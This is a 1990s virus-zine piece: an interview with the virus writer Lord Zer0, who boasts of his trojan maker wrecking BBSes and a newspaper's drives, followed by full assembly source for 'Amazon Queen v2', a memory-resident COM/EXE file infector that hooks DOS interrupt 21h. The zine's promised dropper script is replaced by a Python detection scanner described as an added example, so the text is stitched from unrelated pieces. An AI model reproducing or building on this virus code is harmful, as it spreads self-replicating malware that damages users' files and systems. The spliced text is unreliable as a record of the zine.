Here's a short interview with yet another Swedish viruswriter, Lord Zero. One of his very old source-codes follows this crappy interview, whipped up in a few minutes it looks like :-). Lord Zer0 is the writer of Trojan Horse Maker, which never worked on my machine, but might work on some :-), and of viruses like Swedish_Warrior (included in IR#4) and others. I wish him good luck in the future and thank him for being Swedish and writing viruses :-). - The Unforgiven.

================================================================================

TU> = The Unforgiven
LZ> = Lord Zer0

TU> Give me a short description of who you are?
LZ> - My name is Alexander Augustus Napoleon...

TU> From where did you get your handle, Lord Zer0?
LZ> - From my brain...hehe

TU> Does your handle have some specific meaning?
LZ> - Sure, it means "The LoRD over all the Zer0s"

TU> When did you discover the world of computers?
LZ> - When I was ten and my daddy brought home a PC from his office.

TU> How long have you been active in the scene?
LZ> - Since summer '93.

TU> Why did you start to call boards and such things?
LZ> - " Fame is our greatest enemy. "

TU> How did you come into the virus business?
LZ> - I got a copy of "The little black book of virus" by Mark Ludwig and started experimenting with the "Timid" virus.

TU> Why did you start to write viruses?
LZ> - I've always liked to create things and if I could manage to create "living" things that's exactly what I want to do.

TU> Which goals do you have as a viruswriter?
LZ> - Well, one of my goals is to finish "C.I.V", "Computer Immune Virus" (EXE, WIN, MBR, maybe OS/2, Polymorphic (Gen_X), Stealth and a lot of Anti-AV.)

TU> What programming languages are you familiar with, and what's your favourite language?
LZ> - I am familiar with Visual Basic, C, Quick Basic and Assembler. Assembler is outstanding.

TU> You wrote a trojan-horse maker some while back, is that now a finished project or have you plans to continue on it?
LZ> - It's finished. The last version is 1.52.

TU> Which responses have you had about it?
LZ> - Well, I heard that it was spread like wildfire, many BBS's were fucked up, and there was a war in Finland. DN (the largest Swedish daily paper) got their hard drives fucked up. (L.o.C. also got blacklisted on the Internet and stuff like that, so they had to change their name.)

TU> Do you have any plans to write a virus-code generator?
LZ> - Yes, I have one, which is nearly finished. (When I had the routine creating the infected files left to write I got tired but I'll probably finish it, one day, so stay alert. ;) )

TU> Do you release viruses/trojans into the public?
LZ> - Of course not! ;) Actually, there are already too many of them out there, so a few of my NORMAL creations won't make any difference. No phun! The viruses which are released must include some new ideas or be very widespread, to make someone notice them.

TU> How many viruses have you written?
LZ> - Ten maybe twenty, I don't really know (or care).

TU> How do you name your viruses?
LZ> - Well, in many different ways. I won't tell you.. (It would require at least half a page.)

TU> What motivates you to write viruses?
LZ> - You would never ask an artist: "Why do you paint?"

TU> Do you think you will continue to write viruses?
LZ> - Yes, I will. Today, I can't see the end.

TU> Would you feel guilty if one of your viruses did damage to a hospital?
LZ> - All my viruses are non-destructive. So don't blame me. (And use my software at your own risk...hehe.)

TU> Would you deliberately infect a school or government institution if you knew they would replicate well if you did so?
LZ> - Yes, I think. If it could spread outside the institution. (I will not infect a closed system.)

TU> Do you find it easier to infect pirated software (which is illegal to use), than PD/SW software?
LZ> - No, if I choose to infect pirated software, I have to get something very new if I want many users to get infected. That's the big problem, and besides, elite users know more about viruses than PD/SW people do. So if I'd try to spread a virus, I'd prefer to put it in a PD/SW.

TU> Do you encourage deliberate destructive code in viruses?
LZ> - No. (I wouldn't want to get my HD overwritten, and I think nobody likes that.)

TU> Have you considered writing destructive code in viruses?
LZ> - No, the highest goal of a virus is survival, so why then commit suicide by trashing the HD?

TU> What do you think of the issue concerning 'non-destructive viruses'?
LZ> - I don't agree to it... A virus should be non-destructive.. That's my opinion.

TU> Do you think one can make a virus beneficial?
LZ> - Sure, but then the "virus" is spelled: S O F T W A R E

TU> Have you ever considered writing a GOOD virus?
LZ> - Nope,...How can a virus be GOOD?

TU> Bontchev described in his 'write-up' "Is good Computer-Viruses still a bad idea", do you think one of those viruses can be classified good?
LZ> - A virus which searches/watches for something or updates software may be a beneficial virus.

TU> Do you have any more arguments why viruses can't be beneficial than the ones Bontchev mentioned in his article?
LZ> - My arguments won't make anything different. There're too many problems to solve, and one or two more won't matter.

TU> If you think it's possible to write a good virus, how to solve the above problems?
LZ> - Ask God ;)

TU> About virus-code generators, what is your opinion about them, and about people using them thinking they are hot-shot-eleete?
LZ> - It's a good idea, but it's rather useless. In my opinion people using code generators are lame or stupid. (They want to make a virus but can't or are too lame to write one..BaH!)

TU> Do you write viruses to get recognition in the virus/AV community?
LZ> - No. I just write viruses, because I think it's fun.

TU> What do you think about the media/AV describing viruswriters as lonely individuals with no life?
LZ> - A person who can always do exactly what he wants without having to care about what people think has a FREE life. And about friends; I've got plenty of friends, friends who know things about myself and my virus technique that I've only told them because I can trust them. For example the guys reading through this interview, my press staff...But... to the people who want the truth: Make up your own opinion!

TU> Do you think the scene is asocial or not?
LZ> - It depends on what you make of it, doesn't it?

TU> How are you in real life (in a private matter)?
LZ> - A highly respectable young man, who loves life and doing well at school, which means nothing. (It could be any boy/girl in Sweden who cares about school.)

TU> How do you make your living?
LZ> - Nothing, just spend my parents' money.

TU> Has the scene/viruswriting influenced you in real life?
LZ> - Yes a bit, but not much.

TU> What do your parents/close friends think about your viruswriting?
LZ> - Some of my friends know that I write viruses, but they believe that I won't spread my creations. I don't really know what my parents know about my virus writing, but I suspect they know what I'm doing and as long as I'm doing well at school, they won't care. They probably think that it's just a "game", which will die out in a couple of years.

TU> Are you into viruswriting only or other parts of the computer underground?
LZ> - I crack games and programs. I'm an elite trader (under another handle).

===============================================================================

% Amazon Queen v2 by Lord Zer0 %
--------------------------------

Amazon Queen v2 is a memory resident infector of COM and EXE programs executed, opened (both normal and extended), or touched with the DOS attrib function, thus making this a pretty fast infector.
It 're-vectors' interrupt 21h (DOS) to interrupt 38h, marks EXE files with a '0' in the EXE header's negative checksum address (12h, which of course is ignored) and a few other things... and yeah, it can bug, and there you go.. - The Unforgiven.

================================================================================

.model tiny
.code
org 100h

start:
        push cs
        pop ds
        call begin
begin:
        mov bx,sp
        mov bp,ss:[bx]
        sub bp,offset begin-100h
        inc sp
        inc sp
        push es
        inc [generation-100h+bp]
        mov ah,0ACh
        int 21h
        cmp al,'0'
        jnz go_tsr
        cmp bx,cs:[_version+bp-100h]
        jge return_file
        mov ah,0AEh                     ; uninstall Virus
        int 21h
        mov ah,9                        ; Give the user a notice that s/he has got
                                        ; at least two viruses on the HD...
        lea dx,[bp+vx_name-100h]
        int 21h

go_tsr:
        xor ax,ax
        mov es,ax
        mov di,200h
        mov si,bp
        mov cx,vx_size/2
        rep movsw
        stosw
        stosw
        mov ds,cx
        mov ax,offset int_21+100h
        cli
        xchg ds:[21h*4],ax
        mov ds:[38h*4],ax
        mov ds:[oldint21+100h],ax
        xchg ds:[21h*4+2],cx
        mov ds:[38h*4+2],cx
        mov ds:[oldint21+102h],cx
        sti

return_file:
        pop es
        push cs
        pop ds
        cmp sp,0FFFEh
        je ret_com
        push es
        pop ds
        mov ax,es
        add ax,10h
        add ax,word ptr cs:[bp+buffer+2-100h]
        push ax
        push word ptr cs:[bp+buffer-100h]
        retf

buffer:
        int 20h
        db '00'

ret_com:
        mov di,100h
        dec sp
        dec sp
        mov bx,sp
        mov [bx],di
        lea si,[bp+buffer-100h]
        movsw
        movsw
        xor ax,ax
        retn

vx_name db ' Amazon Queen...v2.0$'

uninstall:
        push ds
        lds dx,dword ptr cs:[oldint21+100h]
        mov ax,2521h
        int 21h
        pop ds
installed:
        mov al,'0'
        mov bx,cs:[_version+100h]
        popf
        iret

int_21:
        pushf
        cmp ah,0ach
        je installed
        cmp ah,0aeh
        je uninstall
        cmp ah,4bh
        je infect
        cmp ah,3dh
        je infect
        cmp ah,43h
        je infect
        cmp ah,6ch
        je infect
return_dos:
        popf
        db 0eah
oldint21 dw ?,?

infect:
        call push_all
        cmp ah,6ch
        jne not_extended
        mov dx,si
not_extended:
        push ds
        pop es
        mov di,dx
        mov al,'.'
        mov cx,64
        repnz scasb
        mov ax,[di]
        or ax,2020h
        cmp ax,'oc'
        je comexe_file
        cmp ax,'xe'
        je comexe_file
        jmp pop_ret

comexe_file:
        mov di,offset buffer+100h
        mov ax,3D02h
        int 38h
        jnc go_on
        jmp pop_ret
go_on:
        xchg ax,bx
        push cs
        push cs
        pop es
        pop ds
        mov ah,3fh
        mov cx,18h
        mov dx,offset exe_hdr+100h
        mov si,dx
        int 38h
        jnc not_close
        jmp close
        db 'WHY?'
not_close:
        call eof
        cmp word ptr [si],'ZM'
        je exe_file
        cmp byte ptr [si],41h
        jne no_close
close_it:
        jmp close
no_close:
        movsw
        movsw
        mov cx,4
        sub ax,cx
        mov [si],0e941h
        mov [si+2],ax
        jmp write

exe_file:
        push si
        add si,14h
        movsw
        movsw
        pop si
        cmp byte ptr [si+12h],'0'
        je close
        push ax
        push dx
        add ax,vx_size
        adc dx,0
        mov cx,200h
        div cx
        or dx,dx
        jz same_page
        inc ax
same_page:
        mov [si+2],dx
        mov [si+4],ax
        mov ax,[si+8]
        mov cl,4
        shl ax,cl
        xchg ax,cx
        pop dx
        pop ax
        sub ax,cx
        sbb dx,0
        mov cx,10h
        div cx
        mov byte ptr [si+12h],'0'
        mov [si+14h],dx
        mov [si+16h],ax
        mov cx,18h

write:
        push cx
        mov ah,40h
        mov dx,200h
        mov cx,vx_size
        int 38h
        call tof
        pop cx
        mov ah,40h
        mov dx,si
        int 38h
        mov ax,5700h
        int 38h
        inc ax
        int 38h
close:
        mov ah,3eh
        int 38h
pop_ret:
        call pop_all
        jmp return_dos

        db 'LoRD Zer0'

tof:
        xor al,al
        jmp movfptr
eof:
        mov al,2
movfptr:
        mov ah,42h
        cwd
        xor cx,cx
        int 38h
        retn

pop_all:
        pop word ptr cs:[where]
        pop di
        pop si
        pop ds
        pop es
        pop dx
        pop cx
        pop bx
        pop ax
        jmp jump_back
push_all:
        pop word ptr cs:[where]
        push ax
        push bx
        push cx
        push dx
        push es
        push ds
        push si
        push di
jump_back:
        jmp word ptr cs:[where]

_version dw 200h
generation dw 1

the_end:
vx_size = $-offset start
where = $+100h
exe_hdr = $+102h
end start

================================================================================

% An alternative script! %
--------------------------

What follows is not exactly the virus (AQ.500), but a dropper which will create a file called zero.com. It does at least contain one hidden area, like oh-so-many of the hex-scripts in this zine do. - The Unforgiven.
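As an added defender-side example (not code from the zine or from Lord Zer0), the following Python scanner checks a COM or EXE image for the traces the listing above leaves behind: the '0' written over the header's negative checksum at 12h, an EXE entry point or a COM 'A'+jmp that lands exactly on an appended body, and the two marker strings. The 500-byte body length is assumed from the AQ.500 name, and the test files are constructed inline with an inert zero-filled body that carries only the strings.

```python
import struct

# Added detection example, not code from the zine. Constants come from the listing
# above; the 500-byte body length is assumed from the AQ.500 name.
VX_SIZE = 500
MARKERS = (b' Amazon Queen...v2.0$', b'LoRD Zer0')


def exe_entry_offset(data: bytes) -> int:
    """File offset of the MZ entry point: header paragraphs*16 + CS*16 + IP."""
    hdr_paras, = struct.unpack_from('<H', data, 0x08)
    ip, cs = struct.unpack_from('<HH', data, 0x14)
    return hdr_paras * 16 + cs * 16 + ip


def scan(data: bytes) -> dict:
    """Report the structural traces the infector leaves, plus its marker strings."""
    findings = []
    appended = len(data) - VX_SIZE              # where an appended body would begin
    if data[:2] == b'MZ' and len(data) >= 0x18:
        if data[0x12] == 0x30:                  # '0' written over the negative checksum
            findings.append('exe_checksum_marker')
        if appended > 0 and exe_entry_offset(data) == appended:
            findings.append('exe_entry_at_tail')  # CS:IP rewritten to the old EOF
    elif data[:2] == b'\x41\xe9' and len(data) >= 4:
        disp, = struct.unpack_from('<H', data, 2)  # 'A' (inc cx) + near jmp displacement
        if 4 + disp == appended:                # jmp lands exactly on the old EOF
            findings.append('com_jmp_to_tail')
    tail = data[-VX_SIZE:]
    findings += ['string:' + m.decode('ascii').strip() for m in MARKERS if m in tail]
    structural = any(not f.startswith('string:') for f in findings)
    strings = any(f.startswith('string:') for f in findings)
    verdict = 'infected' if structural and strings else 'suspicious' if findings else 'clean'
    return {'verdict': verdict, 'findings': findings}


def mz_header(csum: int, ip: int, cs: int) -> bytes:
    """Minimal 32-byte MZ header (2 paragraphs) carrying the fields the scanner reads."""
    return struct.pack('<2s13H', b'MZ', 0x40, 1, 0, 2, 0, 0xFFFF, 0, 0x100,
                       csum, ip, cs, 0x1C, 0).ljust(32, b'\x00')


def constructed_samples() -> dict:
    """Hand-built test files; the 'infected' ones get an inert zero body holding only the strings."""
    body = bytearray(VX_SIZE)
    body[0x80:0x80 + len(MARKERS[0])] = MARKERS[0]
    body[0x100:0x100 + len(MARKERS[1])] = MARKERS[1]
    code = b'\xb4\x4c\xcd\x21' + b'\x90' * 28   # mov ah,4Ch / int 21h + padding (32 bytes)
    com = code + b'\x90' * 32                   # 64-byte clean COM
    bad_com = struct.pack('<HH', 0xE941, len(com) - 4) + com[4:] + bytes(body)
    exe = mz_header(0x1230, 0, 0) + code        # clean; checksum byte just happens to be '0'
    bad_exe = mz_header(0x1230, 0, 2) + code + bytes(body)  # (64-32)/16 -> CS=2, IP=0
    return {'clean_com': com, 'infected_com': bad_com, 'clean_exe': exe, 'infected_exe': bad_exe}
```

The clean EXE sample shows why the checksum byte alone only rates 'suspicious': any host whose checksum low byte is 0x30 carries that marker without being infected, so the verdict requires a string hit as well.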